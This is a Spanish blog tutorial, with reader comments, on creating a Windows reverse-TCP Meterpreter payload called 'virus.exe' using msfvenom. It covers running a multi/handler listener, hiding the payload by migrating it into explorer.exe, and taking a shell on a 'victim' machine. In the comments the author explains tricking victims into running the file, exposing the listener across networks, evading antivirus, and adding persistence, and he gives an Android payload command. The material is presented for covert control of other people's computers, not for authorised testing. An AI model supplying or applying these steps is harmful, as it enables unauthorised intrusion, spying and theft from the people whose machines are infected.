Creación de virus, ocultación y control remoto del equipo víctima. Kali Linux.

Hola muy buenas, hoy os traigo una guía de como crear un virus mediante Metasploit Framework, específicamente con la herramienta que nos proporciona Metasploit y es la de crear payloads, una vez creado el payload crearemos el servidor con el que interactuara el virus para poder tener acceso total a la máquina vícitma, a continuación muestro como:

Hallan-nuevo-poderoso-virus-inform-1554006

Comenzamos con la creación del payload (virus), empezaremos por abrir una consola en Kali Linux y escribiendo el siguiente comando:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=[nuestra IP] LPORT=[9999] -a x86 –platform windows -o /root/Desktop/virus.exe -f exe

Screenshot_1

-p: Especificamos el payload a utilizar.

-a: Arquitectura que va a utilizar el virus.

–platform: Plataforma en la que actuara el virus.

-o: Directorio donde se guardara el virus.

-f: Formato en cual se guardara el virus.

Aquí el virus creado:

Screenshot_2

Ahora procederemos a crear el servidor, el cual interactuara con el equipo o equipos infectados, abrimos una terminal y escribiremos lo siguiente:

msfconsole

Screenshot_3

Una vez ejecutado metasploit, usaremos el siguiente comando:

use multi/handler

Screenshot_4

Una vez ejecutado lo siguiente, ejecutaremos el payload server de la siguiente manera:

set PAYLOAD windows/meterpreter/reverse_tcp

Screenshot_5

Hacemos un show options:

show options

Screenshot_6

Tendremos que insertar lo anteriormente configurado, el LHOST y el LPORT, pondremos los anteriormente configurados en el virus:

set LHOST 192.168.1.116

Screenshot_7

set LPORT 9999

Screenshot_8

Una vez insertados los dos parámetros, procederemos a la explotación:

exploit -j

Una vez explotado, ejecutaremos el virus en un máquina con windows:

Screenshot_9

Una vez ejecutado, en la consola donde explotamos saldrá lo siguiente:

Screenshot_10

Lo siguiente que haremos será ver las sesiones que tenemos ejecutadas con este servidor:

sessions -i

Screenshot_11

Este comando nos dará la información de todas las sesiones que tenemos conectadas a nosotros mediante el virus creado:

Screenshot_12

Como podemos apreciar nos da la información de la víctima, ahora procederemos a habilitar la interacción con el virus para poder mantener el control total de la máquina atacada:

sessions -i 1

Screenshot_13

Esto nos conectará a la máquina atacada, una vez ejecutado haremos un ps, esto sirve para ver los procesos ejecutados de la máquina atacante:

Screenshot_14

Aquí los procesos de la máquina y entre ellos vemos el virus creado:

Screenshot_15

Ahora lo que haremos será ocultarlo a la vista, lo cual lo fusionaremos con otro proceso el cual elegiremos Explorer.exe:

Screenshot_16

Para fusionar los dos procesos, lanzaremos el siguiente comando:

migrate [id del proceso]

Screenshot_17

Objetivo completado:

Screenshot_18

Una vez realizado esto, lanzaremos el comando shell, esto nos dará la consola del equipo víctima:

shell

Screenshot_19

Ahora nos iremos a C:/

Screenshot_20

Llegaremos a C:/ y haremos un dir para ver por ejemplo que carpetas tiene:

Screenshot_21

Aquí el resultado, control total sobre la máquina infectada:

Screenshot_22

Todo el proceso y las imágenes han sido comprobadas y capturadas por mi.

Saludos, David De Maya Merras, @DavidDeMaya

26 comentarios sobre “Creación de virus, ocultación y control remoto del equipo víctima. Kali Linux.

  1. brandon Contestar

    Hola amigo , he visto muchos de esos tutoriales , cuando migro el virus a explores se supones qe alli deberia de ya qedar remotamente , porqe explores se inicia cuando incia sesion windows, lo cual bastaria con solo hacer la coneccion con metasploit , pero a mi no me qeda remotamente …bueno la verdad tampoco me interesa este tipo de virus pues he leido bastante qe es un virus muy para novatos ….lo mejor es aprende a programar….»existen 2 tipos de hackers , el que pograma y el fabricante» suerte compañero !

    • davidd172 Contestar

      Hola brandon, habrás visto muchos tutoriales, pero tendrás primero que aprender a como dominar este tipo de virus, te explico, si no te queda el backdoor nativo, es debido a que migrar un proceso a otro sirve para ocultárselo a la víctima, para dejarlo nativo tienes que seguir otro procedimiento diferente, y si este tipo de virus o backdoor es muy inicial, pero con unas técnicas de ocultación llegan a ser muy eficientes, también es mejor crear un virus a código pero para iniciarse en el hacking esta bastante bien, y por cierto «existen dos tipos de hackers, el que programa y el hacker que utiliza el programa :)» La suerte me acompaña.

        • david Autor del artículoContestar

          Hola Cristian, puedes contactar por telegram @hsdavid172 o por correo en la sección de contacto. Un saludo, David.

    • david Contestar

      Hola Papa Pitufo, sirve también para otras redes, pero para que se pudiesen conectar a ti desde otra red, tendrías que hacer una configuración diferente, por ejemplo abrir un puerto en tu router, para permitir las conexiones de las víctimas, redirigir ese puerto al la máquina atacante, y la configuración de las IP’s en el momento del ataque. Gracias por visitar mi blog.

  2. Mauricio Contestar

    hola tengo una duda, como se hace para copiar y ejecutar el virus.exe en la maquina con windows, se puede hacer remoto? o se debe ejecutar en la maquina y hacer la copia manual? si fuera el caso, me imagino que es aquí donde entra la parte donde se engaña al usuario para que lo ejecute por nosotros verdad ?

    • david Contestar

      Exactamente mauricio ese «virus.exe» es el que debe ejecutar la víctima para que podamos realizar el backdoor. Exactamente lo puedes copiar en la máquina víctima mediante un USB o echar imaginación para que la víctima lo ejecute.
      PD: Gracias por visitar el blog Mauricio. David De Maya.

  3. MrKAli Contestar

    muy bien explicado, ahora sobre los puertos ya lo sabia para hacerlo remoto pero para hacerlo nativo entiendo que tienes que juntarlo a cierto proceso que se ejecute inmediatamente por ejemplo svchost.exe ahora si lo junto a dicho proceso efectuaria al prender la pc ? incluso si la victima llegara a borrar el ejecutable? no se si mi pregunta es muy confusa, trate de explicarme lo mejor posible.

    • david Autor del artículoContestar

      Hola MrKali, aquí te dejo un vídeo del canal de youtube para que puedas hacerlo persistente aunque se reinicie o se borre el .exe, Vídeo, saludos, David.

  4. Juan Contestar

    Buenas, cuando he infectado el ordenador víctima tengo los permisos del usuario que infecte, o permisos de administrador. Gracias 🙂

    • david Autor del artículoContestar

      Hola Juan, en principio tienes los permisos del usuario que ha ejecutado el .exe, en caso de ejecutarlo como administrador, este tendrá como administrador. Un saludo, David.

  5. Gustavo Pinto Contestar

    tengo una duda por que cuando lo inicio en un windows me aparece «la aplicacion no se ha podido inciar correctamente (0xc0000005). Haga clic en aceptar para terminar la aplicacion.» ¿como lo soluciono?

    • david Autor del artículoContestar

      Hola Gustavo, seguramente el .exe no lo tengas bien construido. Un saludo, David.

  6. selena Contestar

    [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
    Error: The following options failed to validate: LHOST, LPORT.
    me sale ese error al tratar de crear el virus

  7. cookie Contestar

    quisiera crear un exploit persistente pero winrar y que al abrir suelte el viruz no se si se pueda lograr, aparte una pregunta como seria si le envió el archivo a la victima y lo habré desde otra red osea otra pc igualmente me da el acceso?

    • david Autor del artículoContestar

      Hola buenas, en principio lo que se debe realizar cuando intentas infectar a una víctima es ofuscar el código de tu «carga» maliciosa, para que las firmas de los antivirus no la detecten e infiltrarla con otra aplicación, cuando metes un backdoor en un winrar posiblemente si puedas, pero en el momento de descompresión el antivirus lo detectará con facilidad, cuando este backdoor, te lo llevas a otra red, tienes que abrir puertos en tu router en caso de hacerlo de esa manera para una prueba de concepto o tener un servidor en algún hosting que sirva de servidor de escucha. Un saludo, David.

  8. Juan Contestar

    Para dejarlo remoto que se inicie cada vez que el equipo comprometido encienda tienes que hacerlo persistente en el mismo, eso se logra una vez que te da el meterpreter, migras al proceso que vas a migrar y en ese momento lo haces persintente

  9. PaTo Contestar

    Hola amigo david oye puedes hacer un tutorial de como programar el virus en kali linux plis

  10. Retr0 Contestar

    Hola bro tengo un problema con el primer comando para crear un payload ya que me sale el siguiente error invalid payload latform. Y no se como solucionarlo me podrias ayudar

    • david Autor del artículoContestar

      Hola,

      ¿Podrías indicar cual es el comando que estás intentando lanzar?

      Un saludo,

      David.

    • david Autor del artículoContestar

      Hola,

      El problema reside en que estás intentado encodear el payload de android el cual no es compatible con «shikata_ga_nai». Te dejo a continuación como sería el comando correcto:

      «msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.100.5 LPORT=4444 -f war > runme.war»

Deja un comentario

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.